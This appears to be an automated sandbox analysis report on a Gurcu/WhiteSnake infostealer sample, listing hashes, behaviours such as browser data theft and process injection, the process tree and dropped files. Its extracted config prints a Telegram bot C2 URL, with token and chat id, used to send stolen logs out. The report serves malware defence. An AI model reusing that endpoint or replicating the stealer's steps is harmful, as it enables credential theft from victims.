Analysis

  • max time kernel
    94s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2024 18:38

General

  • Target

    b-crypted.exe

  • Size

    8.4MB

  • MD5

    b45f3a137a961c8498ee21a246e983ec

  • SHA1

    f7a2dc2bac844aad018498f224adf51f285c1f1b

  • SHA256

    17cc88b4f9976d16cc5c807e91b034fecc721f9988cc52e2056a01e99aabc900

  • SHA512

    ee339e5f4853c425d838493aa9fdac55273601482b804be183367118832d4677375daa46e08755d1f472725cb9d35612e570095f1afffe3db1d336fb139d20bc

  • SSDEEP

    196608:HWIWSNScyO62XEXOV7QUY1MlROz8Uk2Ew2GdKxvY7n7wls8bg:NWSBybi7qelRc8UFAGwxAGs80

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6031927554:AAEXTw-Bhx5o5i_JojmzmJzXPmNMBfive_Y/sendDocument?chat_id=918093463&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b-crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\b-crypted.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3668
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
        PID:1144
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Users\Admin\AppData\Roaming\systemuser.exe
          "C:\Users\Admin\AppData\Roaming\systemuser.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1744
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5016
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:2136
              • C:\Windows\system32\tasklist.exe
                Tasklist /fi "PID eq 1744"
                5⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4640
              • C:\Windows\system32\find.exe
                find ":"
                5⤵
                  PID:4232
                • C:\Windows\system32\timeout.exe
                  Timeout /T 1 /Nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:64
                • C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
                  "C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1452
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA5EF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA5EF.tmp.bat
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4944
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      7⤵
                        PID:1704

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

            Filesize

            1.7MB

            MD5

            65ccd6ecb99899083d43f7c24eb8f869

            SHA1

            27037a9470cc5ed177c0b6688495f3a51996a023

            SHA256

            aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

            SHA512

            533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

          • C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat

            Filesize

            300B

            MD5

            d88f63a793d6e94d0536aaa5d2ae8d04

            SHA1

            db98c760b934b16d483a2e5fe754f09f9678090e

            SHA256

            08b649aa13b688cd6d5882cd1f4c1e5f64ecc087ac61d5f81029090e29b8534a

            SHA512

            cf6133c49799b3a73119649555f59c15018b3cfe0a69da67de637d523b8e0c5986d9c35945b6914f50d1d850896aad8ce512a8afc4d8a9772e27b8603248e5c7

          • C:\Users\Admin\AppData\Local\Temp\tmpA5EF.tmp.bat

            Filesize

            149B

            MD5

            9b50431381f90bb6149dbb5c85095c94

            SHA1

            3eed9d5a930e860d2308abec184946022a258a08

            SHA256

            bc8d12c414c230d3c3d1e444a4a6af0bbe189ba0e810fd5aa3fd2873c5d32d4b

            SHA512

            a581e798ff3db6780740d71e184b98acd42f11a7c7fcbf1416a3b24833a7b09a51487ef382eea5987d5bb3d4fc14cd12be0fef6ba388083b8818256cdfc30480

          • C:\Users\Admin\AppData\Roaming\AdminUserCash\CREDIT~1

            Filesize

            116KB

            MD5

            f70aa3fa04f0536280f872ad17973c3d

            SHA1

            50a7b889329a92de1b272d0ecf5fce87395d3123

            SHA256

            8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

            SHA512

            30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

          • C:\Users\Admin\AppData\Roaming\systemuser.exe

            Filesize

            5.6MB

            MD5

            5328cd66093855fbb2127332ad78cdd6

            SHA1

            7605e73efa3a3bd1c42beddad226ccf355f80e4c

            SHA256

            90daa714224ac1b53c423442d1cd0425bc678c721402ae757034258248d43106

            SHA512

            0e4428281adf02fedaee64233fb63c1296009aa0dbe233036be841afb2bb5443769812389613ef696821cdc9750193599d2bda6b567b92301796bbea8a84098c

          • memory/1452-61-0x00000262F1420000-0x00000262F145A000-memory.dmp

            Filesize

            232KB

          • memory/1452-62-0x00000262F13E0000-0x00000262F1406000-memory.dmp

            Filesize

            152KB

          • memory/1452-59-0x00000262F13B0000-0x00000262F13D2000-memory.dmp

            Filesize

            136KB

          • memory/1452-58-0x00000262F1360000-0x00000262F13B0000-memory.dmp

            Filesize

            320KB

          • memory/1452-57-0x00000262F12B0000-0x00000262F1362000-memory.dmp

            Filesize

            712KB

          • memory/1452-55-0x00000262F1240000-0x00000262F12AA000-memory.dmp

            Filesize

            424KB

          • memory/1452-54-0x00000262D6D00000-0x00000262D6D1E000-memory.dmp

            Filesize

            120KB

          • memory/1452-63-0x00000262F20A0000-0x00000262F23CE000-memory.dmp

            Filesize

            3.2MB

          • memory/1452-88-0x00000262F1460000-0x00000262F1472000-memory.dmp

            Filesize

            72KB

          • memory/1744-34-0x00007FF8568F3000-0x00007FF8568F5000-memory.dmp

            Filesize

            8KB

          • memory/1744-35-0x0000023674F70000-0x0000023675508000-memory.dmp

            Filesize

            5.6MB

          • memory/1744-47-0x00007FF8568F0000-0x00007FF8573B1000-memory.dmp

            Filesize

            10.8MB

          • memory/1744-43-0x00007FF8568F0000-0x00007FF8573B1000-memory.dmp

            Filesize

            10.8MB

          • memory/1744-42-0x00007FF8568F0000-0x00007FF8573B1000-memory.dmp

            Filesize

            10.8MB

          • memory/1744-41-0x00000236779F0000-0x0000023677A66000-memory.dmp

            Filesize

            472KB

          • memory/1744-40-0x00000236778C0000-0x00000236778CA000-memory.dmp

            Filesize

            40KB

          • memory/1820-33-0x0000000074D50000-0x0000000075500000-memory.dmp

            Filesize

            7.7MB

          • memory/1820-20-0x0000000074D50000-0x0000000075500000-memory.dmp

            Filesize

            7.7MB

          • memory/1820-16-0x0000000074D50000-0x0000000075500000-memory.dmp

            Filesize

            7.7MB

          • memory/1820-18-0x0000000005760000-0x00000000057FC000-memory.dmp

            Filesize

            624KB

          • memory/1820-14-0x0000000000400000-0x00000000009B4000-memory.dmp

            Filesize

            5.7MB

          • memory/3668-11-0x0000000074D50000-0x0000000075500000-memory.dmp

            Filesize

            7.7MB

          • memory/3668-8-0x00000000063F0000-0x00000000063FA000-memory.dmp

            Filesize

            40KB

          • memory/3668-13-0x00000000051B0000-0x00000000051CE000-memory.dmp

            Filesize

            120KB

          • memory/3668-12-0x0000000005370000-0x0000000005928000-memory.dmp

            Filesize

            5.7MB

          • memory/3668-17-0x0000000074D50000-0x0000000075500000-memory.dmp

            Filesize

            7.7MB

          • memory/3668-10-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

            Filesize

            4KB

          • memory/3668-9-0x00000000065E0000-0x0000000006656000-memory.dmp

            Filesize

            472KB

          • memory/3668-0-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

            Filesize

            4KB

          • memory/3668-7-0x0000000002BE0000-0x0000000002BE6000-memory.dmp

            Filesize

            24KB

          • memory/3668-6-0x0000000007690000-0x0000000007722000-memory.dmp

            Filesize

            584KB

          • memory/3668-5-0x000000000C7F0000-0x000000000CD94000-memory.dmp

            Filesize

            5.6MB

          • memory/3668-4-0x000000000BC80000-0x000000000C244000-memory.dmp

            Filesize

            5.8MB

          • memory/3668-3-0x0000000074D50000-0x0000000075500000-memory.dmp

            Filesize

            7.7MB

          • memory/3668-2-0x0000000002B40000-0x0000000002B46000-memory.dmp

            Filesize

            24KB

          • memory/3668-1-0x00000000001B0000-0x00000000007AA000-memory.dmp

            Filesize

            6.0MB